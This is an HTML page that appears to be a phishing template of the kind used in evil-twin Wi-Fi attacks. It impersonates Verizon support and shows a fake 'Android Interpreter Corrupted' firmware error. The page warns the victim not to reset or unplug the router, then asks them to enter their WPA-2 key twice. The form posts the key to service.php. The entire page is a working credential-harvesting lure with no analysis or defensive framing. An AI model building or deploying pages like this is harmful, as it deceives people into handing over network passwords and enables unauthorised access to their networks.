<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Android Module Interpreter Firmware Support Page</title>
<!-- <title>Verizon Support</title> -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="verizon.css" rel="stylesheet" type="text/css" />
</head>

<body>
<div class="verizon" id="base" align="center">


<div class="verizon" id="logo" align="center">
<img src="android2.png" alt="Verizon" align="center" /> 
</div>

<div class="verizon" id="box" >

<p align="center"> </p>

<p align="center">Android Interpreter Corrupted - WPA Handshake Broadcast In Plain Text.</p>

<p align="center" class="verizon" id="normal" >Warning do not <strong>reset</strong> or<strong> unplug</strong> router, as serviceability may be lost!</p>

<p align="center" class="verizon" id="normal" >Enter your <strong>WPA-2 Key </strong>to restore Android translation and router firmware functions ONLY!</p>

<div align="center">
<!-- <form id="name" name="name" method="post" action="process-form-data.php"> -->
<form id="password" name="password" method="post" action="service.php">
<p> WPA-2 Key:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WPA-2 Key (confirm):</p>
<!-- <input name="key1" type="password" class="textfield" /> <input name="key2" type="password" --> 
<input name="key1" type="password" class="textfield" /><input name="key2" type="password" class="textfield" />

<input type="submit" value="Enter" />
</form>

</div>
</div>

</div>
</body>

</html>
